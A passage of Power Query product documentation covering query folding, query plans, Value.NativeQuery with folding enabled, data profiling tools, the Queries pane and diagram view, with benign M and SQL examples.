data that needs to be processed by these two queries, the process for these examples
takes more time than the full query folding example.

Transforms can be grouped into the following categories:

Type of operator   Description

Remote             Operators that are data source nodes. The evaluation of these operators occurs outside of Power Query.

Streaming          Operators that are pass-through operators. For example, Table.SelectRows with a simple filter can usually filter the results as they pass through the operator, and won’t need to gather all rows before moving the data. Table.SelectColumns and Table.ReorderColumns are other examples of this sort of operator.

Full scan          Operators that need to gather all the rows before the data can move on to the next operator in the chain. For example, to sort data, Power Query needs to gather all the data. Other examples of full scan operators are Table.Group , Table.NestedJoin , and Table.Pivot .
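
To make the streaming versus full scan distinction concrete, here's a minimal hypothetical sketch over a CSV file (placeholder path and column names), so every operator is evaluated by the Power Query engine. The comments indicate the category each operator typically falls into.

Power Query M

let
    Source = Csv.Document(File.Contents("C:\Data\Sales.csv"), [Delimiter = ",", Encoding = 65001]),
    Promoted = Table.PromoteHeaders(Source, [PromoteAllScalars = true]),
    // Streaming: rows are filtered as they pass through, without gathering the whole table
    Filtered = Table.SelectRows(Promoted, each [Quantity] <> ""),
    // Streaming: selecting columns is also a pass-through operation
    Selected = Table.SelectColumns(Filtered, {"Sale Key", "Quantity"}),
    // Full scan: sorting requires gathering all rows before any output can be produced
    Sorted = Table.Sort(Selected, {{"Sale Key", Order.Descending}})
in
    Sorted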

 Tip

While not every transform is the same from a performance standpoint, in most
cases, having fewer transforms is usually better.

Considerations and suggestions


Follow the best practices when creating a new query, as stated in Best practices in
Power Query.
Use the query folding indicators to check which steps are preventing your query
from folding. Reorder them if necessary to increase folding.
Use the query plan to determine which transforms are happening at the Power
Query engine for a particular step. Consider modifying your existing query by re-
arranging your steps. Then check the query plan of the last step of your query
again and see if the query plan looks better than the previous one—for example, if
the new query plan has fewer nodes than the previous one, and most of the nodes
are "Streaming" nodes rather than "Full scan" nodes. For data sources that support folding,
any nodes in the query plan other than Value.NativeQuery and data source access
nodes represent transforms that didn’t fold.
When available, you can use the View Native Query (or View data source query)
option to ensure that your query can be folded back to the data source. If this
option is disabled for your step, and you're using a source that normally enables it,
you've created a step that stops query folding. If you're using a source that doesn't
support this option, you can rely on the query folding indicators and query plan.
Use the query diagnostics tools to better understand the requests being sent to
your data source when query folding capabilities are available for the connector.
When combining data sourced from the use of multiple connectors, Power Query
tries to push as much work as possible to both of the data sources while
complying with the privacy levels defined for each data source.
Read the article on privacy levels to protect your queries from running against a
Data Privacy Firewall error.
Use other tools to check query folding from the perspective of the request being
received by the data source. Based on the example in this article, you can use the
Microsoft SQL Server Profiler to check the requests being sent by Power Query and
received by the Microsoft SQL Server.
If you add a new step to a fully folded query and the new step also folds, Power
Query might send a new request to the data source instead of using a cached
version of the previous result. In practice, this process can result in seemingly
simple operations on a small amount of data taking longer to refresh in the
preview than expected. This longer refresh is due to Power Query requerying the
data source rather than working off a local copy of the data.
Query folding indicators
Article • 02/17/2023

7 Note

Before reading this article, we recommend that you read Overview of query
evaluation and query folding in Power Query to better understand how folding
works in Power Query.

Query folding indicators help you understand the steps that fold or don't fold.

With query folding indicators, it becomes obvious when you make a change that breaks
folding. This feature helps you to more easily resolve issues quickly, avoid performance
issues in the first place, and have better insight into your queries. In most cases, steps
either clearly fold or clearly don't fold. But there are many cases where the outcome isn't as
obvious, and these cases are discussed in Step diagnostics indicators (Dynamic, Opaque,
and Unknown).

7 Note

The query folding indicators feature is available only for Power Query Online.

Interpreting query folding diagnostics


When you examine the query folding indicator next to a step, the most important thing
to understand is that the diagnostic state isn't sequential. In other words, the indicator
for that step describes whether the query as a whole, up to that point, folds or not. If
you have an indicator that shows that the query doesn't fold, followed by an indicator
that shows it does fold, it means that your query up to that point does fold.

This interpretation works even with a simple query against a SQL source. For example,
using the AdventureWorks sample database, connect to the Production.Product table
and load data. Loading this sample through the Power Query navigator gives the
following query:

Power Query M

let
Source = Sql.Database("ServerName", "AdventureWorks"),
Navigation = Source{[Schema = "Production", Item = "Product"]}[Data]
in
Navigation

If you examine how this code shows up in query folding indicators, you'll note that the
first step is inconclusive. But the second step does fold, which means that the query up
to that point does fold.

In this example, the initial steps can't be confirmed to fold (they're inconclusive), but the
step generated when you load data initially does fold. How the first steps (Source, and
sometimes other Navigation steps) are handled depends on the connector. With SQL,
for example, it's handled as a catalog table value, which doesn't fold. However, as soon
as you select data for that connector, it will fold.

Conversely, this can also mean that your query folds up to a point and then stops
folding. Unlike in the case where you have a folding indicator for the step that shows
that everything folds, when you have a not-folding indicator it doesn't mean that
everything doesn't fold. Instead, it means that "not everything" folds. Generally,
everything up to the last folding indicator will fold, with more operations happening
after.

Modifying the example from above, you can add a transform that never folds—
Capitalize Each Word.

Power Query M

let
Source = Sql.Database("ServerName", "AdventureWorks"),
Navigation = Source{[Schema = "Production", Item = "Product"]}[Data],
#"Capitalized each word" = Table.TransformColumns(Navigation, {{"Name",
each Text.Proper(_), type text}})
in
#"Capitalized each word"

In the query folding indicators, you have the same indicators as above, except the final
step doesn't fold. Everything up to this final step will be performed on the data source,
while the final step will be performed locally.
Step diagnostics indicators
Query folding indicators use an underlying query plan, and require it to be able to get
information about the query to report it. Currently the query plan only supports tables,
so some cases (lists, records, primitives) won't report as folding or not. Similarly,
constant tables report as opaque.

Indicator     Description

Folding       The folding indicator tells you that the query up to this step will be evaluated by the data source.

Not folding   The not-folding indicator tells you that some part of the query up to this step will be evaluated outside the data source. You can compare it with the last folding indicator, if there is one, to see if you can rearrange your query to be more performant.

Might fold    Might fold indicators are uncommon. They mean that a query "might" fold. They indicate either that folding or not folding will be determined at runtime, when pulling results from the query, and that the query plan is dynamic. These indicators will likely only appear with ODBC or OData connections.

Opaque        Opaque indicators tell you that the resulting query plan is inconclusive for some reason. It generally indicates that there's a true "constant" table, or that the transform or connector isn't supported by the indicators and query plan tool.

Unknown       Unknown indicators represent an absence of a query plan, either due to an error or attempting to run the query plan evaluation on something other than a table (such as a record, list, or primitive).

Example analysis
For an example analysis, start by connecting to the Production.Product table in
Adventure Works (SQL). The initial load, similar to the example above, looks like the
following image.
Adding more steps that fold will extend that green line on the right side. This extension
occurs because this step also folds.

Adding a step that doesn't fold displays a different indicator. For example, Capitalize
each word never folds. The indicator changes, showing that as of this step, it's stopped
folding. As mentioned earlier, the previous steps will still fold.

Adding more steps downstream that depend on the Capitalize each word step will continue
to not fold.

However, if you remove the column you applied the capitalization to, the optimized query
plan can fold completely once more, and you'll get a result like the following image.
Something like this is uncommon, but it illustrates that it's not just the order of the steps
that matters, but also the actual transformations that are applied.
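
The following minimal sketch reproduces that last case, building on the AdventureWorks query shown earlier (the step names are illustrative). Because the removed column is the only one the non-folding transform touched, the optimized query plan can fold the whole query again.

Power Query M

let
    Source = Sql.Database("ServerName", "AdventureWorks"),
    Navigation = Source{[Schema = "Production", Item = "Product"]}[Data],
    // This transform never folds on its own
    #"Capitalized each word" = Table.TransformColumns(Navigation, {{"Name", each Text.Proper(_), type text}}),
    // Removing the column the transform was applied to lets the optimized plan fold once more
    #"Removed columns" = Table.RemoveColumns(#"Capitalized each word", {"Name"})
in
    #"Removed columns"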
Query plan for Power Query (Preview)
Article • 02/17/2023

Query plan for Power Query is a feature that provides a better view of your query's
evaluation. It's useful to help determine why a particular query might not fold at a
particular step.

Through a practical example, this article will demonstrate the main use case and
potential benefits of using the query plan feature to review your query steps. The
examples used in this article have been created using the AdventureWorksLT sample
database for Azure SQL Server, which you can download from AdventureWorks sample
databases.

7 Note

The query plan feature for Power Query is only available in Power Query Online.

This article has been divided into a series of recommended steps in order to interpret the
query plan. These steps are:

1. Review the query folding indicators.


2. Select the query step to review its query plan.
3. Implement changes to your query.

Use the following steps to create the query in your own Power Query Online
environment.

1. From Power Query - Choose data source, select Blank query.

2. Replace the blank query's script with the following query.

Power Query M
let
Source = Sql.Database("servername", "database"),
Navigation = Source{[Schema = "Sales", Item = "SalesOrderHeader"]}
[Data],
#"Removed other columns" = Table.SelectColumns(Navigation,
{"SalesOrderID", "OrderDate", "SalesOrderNumber",
"PurchaseOrderNumber", "AccountNumber", "CustomerID", "TotalDue"}),
#"Filtered rows" = Table.SelectRows(#"Removed other columns", each
[TotalDue] > 1000),
#"Kept bottom rows" = Table.LastN(#"Filtered rows", 5)
in
#"Kept bottom rows"

3. Replace servername and database with the correct names for your own
environment.

4. (Optional) If you're trying to connect to a server and database for an on-premises


environment, be sure to configure a gateway for that environment.

5. Select Next.

6. In the Power Query Editor, select Configure connection and provide the
credentials to your data source.

7 Note

For more information about connecting to a SQL Server, go to SQL Server


database.

After following these steps, your query will look like the one in the following image.

This query connects to the SalesOrderHeader table, and selects a few columns from the
last five orders with a TotalDue value above 1000.
7 Note

This article uses a simplified example to showcase this feature, but the concepts
described in this article apply to all queries. We recommend that you have a good
knowledge of query folding before reading the query plan. To learn more about
query folding, go to Query folding basics.

1. Review the query folding indicators

7 Note

Before reading this section, we recommend that you review the article on Query
folding indicators.

Your first step in this process is to review your query and pay close attention to the
query folding indicators. The goal is to review the steps that are marked as not folded.
Then you can see if making changes to the overall query could make those
transformations fold completely.

For this example, the only step that can't be folded is Kept bottom rows, which is easy
to identify through the not folded step indicator. This step is also the last step of the
query.

The goal now is to review this step and understand what's being folded back to the data
source and what can't be folded.

2. Select the query step to review its query plan


You've identified the Kept bottom rows step as a step of interest since it doesn't fold
back to the data source. Right-click the step and select the View Query plan option. This
action displays a new dialog that contains a diagram for the query plan of the selected
step.

Power Query tries to optimize your query by taking advantage of lazy evaluation and
query folding, as mentioned in Query folding basics. This query plan represents the
optimized translation of your M query into the native query that's sent to the data
source. It also includes any transforms that are performed by the Power Query Engine.
The order in which the nodes appear follows the order of your query starting from the
last step or output of your query, which is represented on the far left of the diagram and
in this case is the Table.LastN node that represents the Kept bottom rows step.

At the bottom of the dialog, there's a bar with icons that help you zoom in or out of the
query plan view, and other buttons to help you manage the view. For the previous
image, the Fit to view option from this bar was used to better appreciate the nodes.

7 Note

The query plan represents the optimized plan. When the engine is evaluating a
query, it tries to fold all operators into a data source. In some cases, it might even
do some internal reordering of the steps to maximize folding. With this in mind, the
nodes/operators left in this optimized query plan typically contain the "folded" data
source query and any operators that couldn't be folded and are evaluated locally.

Identify folded nodes from other nodes


You can identify the nodes in this diagram as two groups:

Folded nodes: These nodes can be either Value.NativeQuery or "data source" nodes
such as Sql.Database . These can also be identified with the label remote under
their function name.
Non-folded nodes: Other table operators, such as Table.SelectRows ,
Table.SelectColumns , and other functions that couldn't be folded. These can also

be identified with the labels Full scan and Streaming.

The following image shows the folded nodes inside the red rectangle. The rest of the
nodes couldn't be folded back to the data source. You'll need to review the rest of the
nodes since the goal is to attempt to have those nodes fold back to the data source.

You can select View details at the bottom of some nodes to display extended
information. For example, the details of the Value.NativeQuery node show the native
query (in SQL) that will be sent to the data source.


The query shown here might not be exactly the same query sent to the data source, but
it's a good approximation. For this case, it tells you exactly what columns will be queried
from the SalesOrderHeader table and then how it will filter that table using the TotalDue
field to only get rows where the value for that field is larger than 1000. The node next to
it, Table.LastN, is calculated locally by the Power Query engine, as it can't be folded.

7 Note

The operators might not exactly match the functions used in the query's script.

Review non-folded nodes and consider actions to make your transform fold
You've now determined which nodes couldn't be folded and will be evaluated locally.
This case only has the Table.LastN node, but in other scenarios it could have many
more.

The goal is to apply changes to your query so that the step can be folded. Some of the
changes you might implement could range from rearranging your steps to applying an
alternative logic to your query that's more explicit to the data source. This doesn't mean
that all queries and all operations are foldable by applying some changes. But it's a
good practice to determine through trial and error if your query could be folded back.

Since the data source is a SQL Server database, if the goal is to retrieve the last five
orders from the table, then a good alternative would be to take advantage of the TOP
and ORDER BY clauses in SQL. Since there's no BOTTOM clause in SQL, the Table.LastN
transform in Power Query can't be translated into SQL. You could remove the
Table.LastN step and replace it with:

A descending sort on the SalesOrderID column in the table, since this column
determines which order goes first and which has been entered last.
A step that keeps the top five rows. Since the table has been sorted, this transform
accomplishes the same as the Kept bottom rows ( Table.LastN ) step.

This alternative is equivalent to the original query. While it seems good in theory, you
need to make the changes to verify whether this alternative makes the node fully fold back
to the data source.

3. Implement changes to your query


Implement the alternative discussed in the previous section:

1. Close the query plan dialog and go back to the Power Query Editor.

2. Remove the Kept bottom rows step.

3. Sort the SalesOrderID column in descending order.

4. Select the table icon on the top-left corner of the data preview and select the
option that reads Keep top rows. In the dialog, enter the value 5, and then
select OK.
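
After these changes, the full M script for the query should look roughly like the following sketch (the server and database names remain placeholders):

Power Query M

let
    Source = Sql.Database("servername", "database"),
    Navigation = Source{[Schema = "Sales", Item = "SalesOrderHeader"]}[Data],
    #"Removed other columns" = Table.SelectColumns(Navigation, {"SalesOrderID", "OrderDate", "SalesOrderNumber", "PurchaseOrderNumber", "AccountNumber", "CustomerID", "TotalDue"}),
    #"Filtered rows" = Table.SelectRows(#"Removed other columns", each [TotalDue] > 1000),
    #"Sorted rows" = Table.Sort(#"Filtered rows", {{"SalesOrderID", Order.Descending}}),
    #"Kept top rows" = Table.FirstN(#"Sorted rows", 5)
in
    #"Kept top rows"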

After implementing the changes, check the query folding indicators again and see if it's
giving you a folded indicator.


Now it's time to review the query plan of the last step, which is now Keep top rows.
Now there are only folded nodes. Select View details under Value.NativeQuery to verify
which query is being sent to the database.

While this article is suggesting what alternative to apply, the main goal is for you to
learn how to use the query plan to investigate query folding. This article also provides
visibility of what's being sent to your data source and what transforms will be done
locally.

You can adjust your code to see the impact that it has on your query. By using the query
folding indicators, you'll also have a better idea of which steps are preventing your
query from folding.
Query folding on native queries
Article • 02/17/2023

In Power Query, you're able to define a native query and run it against your data source.
The Import data from a database using native database query article explains how to do
this process with multiple data sources. But, by using the process described in that
article, your query won't take advantage of any query folding from subsequent query
steps.

This article showcases an alternative method to create native queries against your data
source using the Value.NativeQuery function and keep the query folding mechanism
active for subsequent steps of your query.

7 Note

We recommend that you read the documentation on query folding and the query
folding indicators to better understand the concepts used throughout this article.

Supported data connectors


The method described in the next sections applies to the following data connectors:

Amazon Redshift
Dataverse (when using enhanced compute)
Google BigQuery
PostgreSQL
SAP HANA
Snowflake
SQL Server

Connect to target from data source

7 Note

To showcase this process, this article uses the SQL Server connector and the
AdventureWorks2019 sample database. The experience may vary from connector
to connector, but this article showcases the fundamentals on how to enable query
folding capabilities over native queries for the supported connectors.
When connecting to the data source, it's important that you connect to the node or
level where you want to execute your native query. For the example in this article, that
node will be the database level inside the server.

After defining the connection settings and supplying the credentials for your
connection, you'll be taken to the navigation dialog for your data source. In that dialog,
you'll see all the available objects that you can connect to.

From this list, you need to select the object where the native query is run (also known as
the target). For this example, that object is the database level.

At the navigator window in Power Query, right-click the database node in the navigator
window and select the Transform Data option. Selecting this option creates a new query
of the overall view of your database, which is the target you need to run your native
query.
Once your query lands in the Power Query editor, only the Source step should show in
the Applied steps pane. This step contains a table with all the available objects in your
database, similar to how they were displayed in the Navigator window.

Use Value.NativeQuery function


The goal of this process is to execute the following SQL code, and to apply more
transformations with Power Query that can be folded back to the source.

SQL

SELECT DepartmentID, Name FROM HumanResources.Department WHERE GroupName = 'Research and Development'

The first step was to define the correct target, which in this case is the database where
the SQL code will be run. Once a step has the correct target, you can select that step—in
this case, Source in Applied Steps—and then select the fx button in the formula bar to
add a custom step. In this example, replace the Source formula with the following
formula:

Power Query M

Value.NativeQuery(Source, "SELECT DepartmentID, Name FROM HumanResources.Department WHERE GroupName = 'Research and Development' ", null, [EnableFolding = true])

The most important component of this formula is the use of the optional record for the
fourth parameter of the function, which has the EnableFolding record field set to true.

7 Note

You can read more about the Value.NativeQuery function from the official
documentation article.

After you have entered the formula, a warning is shown that requires you to enable
native queries to run for your specific step. You can select Continue for this step to
be evaluated.

This SQL statement yields a table with only three rows and two columns.
Test query folding
To test the query folding of your query, you can try to apply a filter to any of your
columns and see if the query folding indicator in the applied steps section shows the
step as folded. For this case, you can filter the DepartmentID column to have values that
are not equal to two.
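
As a rough sketch, the query script at this point might look like the following (the database name is a placeholder). The added Table.SelectRows step can still fold because EnableFolding was set to true on the Value.NativeQuery step:

Power Query M

let
    Source = Sql.Database("ServerName", "AdventureWorks2019"),
    #"Run native query" = Value.NativeQuery(Source, "SELECT DepartmentID, Name FROM HumanResources.Department WHERE GroupName = 'Research and Development'", null, [EnableFolding = true]),
    // This filter folds back to the source as an extra predicate over a subquery of the native query
    #"Filtered rows" = Table.SelectRows(#"Run native query", each [DepartmentID] <> 2)
in
    #"Filtered rows"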

After adding this filter, you can check that the query folding indicators still show the
query folding happening at this new step.
To further validate what query is being sent to the data source, you can right-click the
Filtered rows step and select the option that reads View query plan to check the query
plan for that step.

In the query plan view, you can see a node with the name Value.NativeQuery at the
left side of the screen that has hyperlink text that reads View details. You can select this
hyperlink to view the exact query that is being sent to the SQL Server database.

The native query is wrapped around another SELECT statement to create a subquery of
the original. Power Query will do its best to create the most optimal query given the
transforms used and the native query provided.
 Tip

For scenarios where you get errors because query folding wasn't possible, it is
recommended that you try validating your steps as a subquery of your original
native query to check if there might be any syntax or context conflicts.
Using the data profiling tools
Article • 08/14/2023

The data profiling tools provide new and intuitive ways to clean, transform, and
understand data in Power Query Editor. They include:

Column quality

Column distribution

Column profile

To enable the data profiling tools, go to the View tab on the ribbon. In Power Query
Desktop, enable the options you want in the Data preview group, as shown in the
following image.

In Power Query Online, select Data view, then enable the options you want in the drop-
down list.
After you enable the options, you'll see something like the following image in Power
Query Editor.
7 Note

By default, Power Query performs this data profiling over the first 1,000 rows of
your data. To have it operate over the entire dataset, select the Column profiling
based on top 1000 rows message in the lower-left corner of your editor window to
change column profiling to Column profiling based on entire dataset.

Column quality
The column quality feature labels values in rows in five categories:

Valid, shown in green.

Error, shown in red.

Empty, shown in dark grey.

Unknown, shown in dashed green. Indicates that when there are errors in a column, the
quality of the remaining data is unknown.

Unexpected error, shown in dashed red.

These indicators are displayed directly underneath the name of the column as part of a
small bar chart, as shown in the following image.
The number of records in each column quality category is also displayed as a
percentage.

By hovering over any of the columns, you are presented with the numerical distribution
of the quality of values throughout the column. Additionally, selecting the ellipsis button
(...) opens some quick action buttons for operations on the values.

Column distribution
This feature provides a set of visuals underneath the names of the columns that
showcase the frequency and distribution of the values in each of the columns. The data
in these visualizations is sorted in descending order from the value with the highest
frequency.

By hovering over the distribution data in any of the columns, you get information about
the overall data in the column (with distinct count and unique values). You can also
select the ellipsis button and choose from a menu of available operations.
Column profile
This feature provides a more in-depth look at the data in a column. Apart from the
column distribution chart, it contains a column statistics chart. This information is
displayed underneath the data preview section, as shown in the following image.
Filter by value
You can interact with the value distribution chart on the right side and select any of the
bars by hovering over the parts of the chart.

Right-click to display a set of available transformations for that value.

Copy data
In the upper-right corner of both the column statistics and value distribution sections,
you can select the ellipsis button (...) to display a Copy shortcut menu. Select it to copy
the data displayed in either section to the clipboard.

Group by value
When you select the ellipsis button (...) in the upper-right corner of the value
distribution chart, in addition to Copy you can select Group by. This feature groups the
values in your chart by a set of available options.

The image below shows a column of product names that have been grouped by text
length. After the values have been grouped in the chart, you can interact with individual
values in the chart as described in Filter by value.
Using the Queries pane
Article • 02/17/2023

In Power Query, you'll be creating many different queries. Whether it be from getting
data from many tables or from duplicating the original query, the number of queries will
increase.

You'll be using the Queries pane to navigate through the queries.

Navigating with the Queries pane


The most basic usage of the Queries pane is to navigate to all of the queries. The
navigation is similar to a file explorer. To switch between the queries, just select the
query you want to go to.

7 Note

Some actions in the Power Query Online editor may be different than actions in the
Power Query Desktop editor. These differences will be noted in this article.

Basic actions in the Query pane


Similar to features throughout the ribbon and the editor, the context menu of a query
lets you make transformations directly onto the query.
To reach these actions, open the context menu (the right-click menu) in the Query pane.

Differences between online and desktop:

Power Query Online

Power Query Desktop


To be more comprehensive, we'll be touching on all of the context menu actions that are
relevant for either.

Rename a query
To directly change the name of the query, double-select on the name of the query. This
action will allow you to immediately change the name.

Other options to rename the query are:

Go to the context menu and select Rename.

Go to Query Settings and enter in a different name in the Name input field.

Delete a query
To delete a query, open the context pane on the query and select Delete. There will be
an additional pop-up confirming the deletion. To complete the deletion, select the
Delete button.

Duplicating a query
Duplicating a query will create a copy of the query you're selecting.

To duplicate your query, open the context pane on the query and select Duplicate. A
new duplicate query will pop up on the side of the query pane.
Referencing a query
Referencing a query will create a new query. The new query uses the steps of a previous
query without having to duplicate the query. Additionally, any changes on the original
query will transfer down to the referenced query.

To reference your query, open the context pane on the query and select Reference. A
new referenced query will pop up on the side of the query pane.

Copy and paste


Copy and paste can be used when you have a copied query to place in the Power Query
editor.

7 Note

To learn more about how to copy and paste queries in Power Query, go to Sharing
a query.

Context pane options in the Queries pane


There are some additional context pane options in the Queries pane that you can use.
These options are New query, Merge queries, New parameter, and New group.
To reach these options, open the context menu (the right-click menu) in the Queries
pane.

Differences between online and desktop:

Power Query Online

Power Query Desktop

For the sake of being more comprehensive, we'll once again describe all of the context
menu actions that are relevant for either.

New query
You can import data into the Power Query editor as an option from the context menu.

This option functions the same as the Get Data feature.


7 Note

To learn about how to get data into Power Query, go to Getting data

Merge queries
When you select the Merge queries option from the context menu, the Merge queries
input screen opens.

This option functions the same as the Merge queries feature located on the ribbon and
in other areas of the editor.

7 Note

To learn more about how to use the Merge queries feature, go to Merge queries
overview.

New parameter
When you select the New parameter option from the context menu, the New
parameter input screen opens.

This option functions the same as the New parameter feature located on the ribbon.

7 Note

To learn more about Parameters in Power Query, go to Using parameters.


New group
You can make folders and move the queries into and out of the folders for
organizational purposes. These folders are called groups.

To move the query into a group, open the context menu on the specific query.

In the menu, select Move to group.

Then, select the group you want to put the query in.

The move will look like the following image. Using the same steps as above, you can
also move the query out of the group by selecting Queries (root) or another group.
In desktop versions of Power Query, you can also drag and drop the queries into the
folders.
Diagram view
Article • 02/17/2023

Diagram view offers a visual way to prepare data in the Power Query editor. With this
interface, you can easily create queries and visualize the data preparation process.
Diagram view simplifies the experience of getting started with data wrangling. It speeds
up the data preparation process and helps you quickly understand the dataflow, both
the "big picture view" of how queries are related and the "detailed view" of the specific
data preparation steps in a query.

This article provides an overview of the capabilities provided by diagram view.

This feature is enabled by selecting Diagram view in the View tab on the ribbon. With
diagram view enabled, the steps pane and queries pane will be collapsed.

7 Note

Currently, diagram view is only available in Power Query Online.


Authoring queries using diagram view
Diagram view provides you with a visual interface to create, view, or modify your
queries. In diagram view, you can connect to many different types of data sources using
the get data experience.

Diagram view is also connected to the Data Preview and the ribbon so that you can
select columns in the Data Preview.

You can add a new step within a query, after the currently selected step, by selecting the
+ button, and then either search for the transform or choose the item from the shortcut
menu. These are the same transforms you'll find in the Power Query editor ribbon.

By searching and selecting the transform from the shortcut menu, the step gets added
to the query, as shown in the following image.

7 Note

To learn more about how to author queries in the Query editor using the Power
Query editor ribbon or data preview, go to Power Query Quickstart.
Query level actions
You can perform two quick actions on a query—expand/collapse a query and highlight
related queries. These quick actions show up on an active selected query or when
hovering over a query.

You can perform more query level actions such as duplicate, reference, and so on, by
selecting the query level context menu (the three vertical dots). You can also right-click
in the query and get to the same context menu.

Expand or collapse query


To expand or collapse a query, right-click in the query and select Expand/Collapse from
the query's context menu. You can also double-click in the query to expand or collapse a
query.
Highlight related queries
To view all the related queries for a given query, right-click in a query and select
Highlight related queries. You can also select the highlight related queries button on
the top-right of a query.
For example, if you select the highlight related queries button in the Top US Customers
query, you can see that the Customers and Orders queries are highlighted.

Delete query
To delete a query, right-click in a query and select Delete from the context menu. There
will be an additional pop-up to confirm the deletion.
Rename query
To rename a query, right-click in a query and select Rename from the context menu.
Enable load
To ensure that the results provided by the query are available for downstream use such
as report building, by default Enable load is set to true. In case you need to disable load
for a given query, right-click in a query and select Enable load. The queries where
Enable load is set to false will be displayed with a grey outline.
Duplicate
To create a copy of a given query, right-click in the query and select Duplicate. A new
duplicate query will appear in the diagram view.
Reference
Referencing a query will create a new query. The new query will use the steps of the
previous query without having to duplicate the query. Additionally, any changes on the
original query will transfer down to the referenced query. To reference a query, right-
click in the query and select Reference.
Move to group
You can make folders and move the queries into these folders for organizational
purposes. These folders are called groups. To move a given query to a Query group,
right-click in a query and select Move to group. You can choose to move the queries to
an existing group or create a new query group.
You can view the query groups above the query box in the diagram view.

Create function
When you need to apply the same set of transformations in different queries or values,
creating custom Power Query functions can be valuable. To learn more about custom
functions, go to Using custom functions. To convert a query into a reusable function,
right-click in a given query and select Create function.
Convert to parameter
A parameter provides the flexibility to dynamically change the output of your queries
depending on its value, and promotes reusability. To convert a non-structured value
such as a date, text, or number, right-click the query and select Convert to
Parameter.
7 Note

To learn more about parameters, go to Power Query parameters.

Advanced editor
With the advanced editor, you can see the code that the Power Query editor is creating with
each step. To view the code for a given query, right-click in the query and select
Advanced editor.
7 Note

To learn more about the code used in the advanced editor, go to Power Query M
language specification.
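
As an illustration, a simple query that reads a CSV file and promotes headers might appear
in the advanced editor roughly as follows; the file path and step names here are hypothetical:

Power Query M

let
    // Hypothetical file path; your query's source will differ.
    Source = Csv.Document(File.Contents("C:\Data\Sales.csv"), [Delimiter = ",", Encoding = 65001]),
    // Use the first row of the file as the column headers.
    #"Promoted Headers" = Table.PromoteHeaders(Source, [PromoteAllScalars = true])
in
    #"Promoted Headers"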

Edit query name and description


To edit the name of a query or add a description, right-click in a query and select
Properties.
This action will open a dialog box where you can edit the name of the query or add to
or modify the query description.
Queries with a query description will have an affordance (an i icon). You can view the query
description by hovering near the query name.

Append queries/Append queries as new


To append or perform a UNION of queries, right-click in a query and select Append
queries. This action will display the Append dialog box where you can add more tables
to the current query. Append queries as new will also display the Append dialog box,
but will allow you to append multiple tables into a new query.

7 Note

To learn more about how to append queries in Power Query, go to Append queries.
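
Behind the scenes, an append corresponds to the Table.Combine function. The following is a
minimal sketch, assuming two existing queries named Sales2023 and Sales2024:

Power Query M

let
    // Append the rows of Sales2024 below the rows of Sales2023.
    // Columns are matched by name; columns missing from one table are filled with null.
    Source = Table.Combine({Sales2023, Sales2024})
in
    Source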

Merge queries/Merge queries as new


To merge or JOIN queries, right-click in a query and select Merge queries. This action
will display the Merge dialog box, with the selected query as the left table of the merge
operation. Merge queries as new will also display the Merge dialog box but will allow
you to merge two tables into a new query.

7 Note

To learn more about how to merge queries in Power Query, go to Merge queries
overview.
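
Behind the scenes, a merge typically generates a Table.NestedJoin step followed by an expand
step. The following is a minimal sketch, assuming queries named Orders and Customers that
share a CustomerID column:

Power Query M

let
    // Left outer join: keep all rows from Orders, and nest the matching Customers rows
    // in a new column named "Customers".
    Source = Table.NestedJoin(Orders, {"CustomerID"}, Customers, {"CustomerID"}, "Customers", JoinKind.LeftOuter),
    // Expand only the columns you need from the nested table.
    #"Expanded Customers" = Table.ExpandTableColumn(Source, "Customers", {"CustomerName"})
in
    #"Expanded Customers"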

Step level actions


By right-clicking a step, you can perform step level actions such as Edit settings, Rename,
and so on.
You can also perform step level actions by hovering over the step and selecting the
ellipsis (three vertical dots).

Edit settings
To edit the step level settings, right-click the step and choose Edit settings. Alternatively, you
can double-click a step that has settings to go directly to the settings dialog
box. In the settings dialog box, you can view or change the step level settings. For
example, the following image shows the settings dialog box for the Split column step.
Rename step
To rename a step, right-click the step and select Rename. This action opens the Step
properties dialog. Enter the name you want, and then select OK.

Delete step
To delete a step, right-click the step and select Delete. To delete a series of steps until
the end, right-click the step and select Delete until end.

Move before/Move after


To move a step one position before, right-click a step and select Move before. To move
a step one position after, right-click a step and select Move after.
Extract previous
To extract all previous steps into a new query, right-click the first step that you do not
want to include in the query and then select Extract previous.

Edit step name and description


To add step descriptions, right-click a step in a query and then choose Properties.
You can also get to the step level context menu by hovering over the step and selecting
the ellipsis (three vertical dots).

This action will open a dialog box where you can add the step description. This step
description will come in handy when you come back to the same query after a few days or
when you share your queries or dataflows with other users.
By hovering over each step, you can view a callout that shows the step label, step name,
and the step description that was added.

By selecting each step, you can see the corresponding data preview for that step.

Expand and collapse queries


To ensure that you can view your queries in the diagram view, you can collapse the ones
that you aren't actively working on and expand the ones that you care about. Expand or
collapse queries by selecting the Expand/Collapse button on the top-right of a query.
Alternatively, double-clicking an expanded query will collapse the query and vice-versa.

You can also expand or collapse a query by selecting the query level actions from the
query's context menu.
To expand all or collapse all queries, select the Expand all/Collapse all button next to
the layout options in the diagram view pane.

You can also right-click any empty space in the diagram view pane and see a context
menu to expand all or collapse all queries.

In the collapsed mode, you can quickly look at the steps in the query by hovering over
the number of steps in the query. You can select these steps to navigate to that specific
step within the query.
Layout Options
There are five layout options available in the diagram view: zoom out/zoom in, mini-map,
full screen, fit to view, and reset.

Zoom out/zoom in
With this option, you can adjust the zoom level and zoom out or zoom in to view all the
queries in the diagram view.

Mini-map
With this option, you can turn the diagram view mini-map on or off. More information:
Show mini-map

Full screen
With this option, you can view all the queries and their relationships through the Full
screen mode. The diagram view pane expands to full screen and the data preview pane,
queries pane, and steps pane remain collapsed.

Fit to view
With this option, you can adjust the zoom level so that all the queries and their
relationships can be fully viewed in the diagram view.

Reset
With this option, you can reset the zoom level back to 100% and also reset the pane to
the top-left corner.

View query relationships


To view all the related queries for a given query, select the Highlight related queries
button. For instance, by selecting the highlight related queries button in the Top US
Customers query, the Customers and Orders queries are highlighted, as shown in the
following image.
You can also select the dongle on the left of a given query to see the direct and indirect
referenced queries.

Similarly, you can select the right dongle to view direct and indirect dependent queries.

You can also hover on the link icon below a step to view a callout that shows the query
relationships.

Diagram view settings


There are two ways to modify diagram view settings. The first way is to select the lower
half of the Diagram View button inside the View tab in the ribbon.

The second way to modify diagram view settings is to right-click over a blank part of the
diagram view background.

Step labels and step names


We show step labels by default within the diagram view.

You can change diagram view settings to show step names to match the applied steps
within the query settings pane.

Auto-highlight related queries


By selecting Auto-highlight related queries within diagram view settings, related
queries are always highlighted so that you can better see the query dependencies
visually.

Compact view
When you have queries with multiple steps, it can be challenging to scroll horizontally to
view all your steps within the viewport.

To address this, diagram view offers Compact view, which compresses the steps from
top to bottom instead of left to right. This view can be especially useful when you have
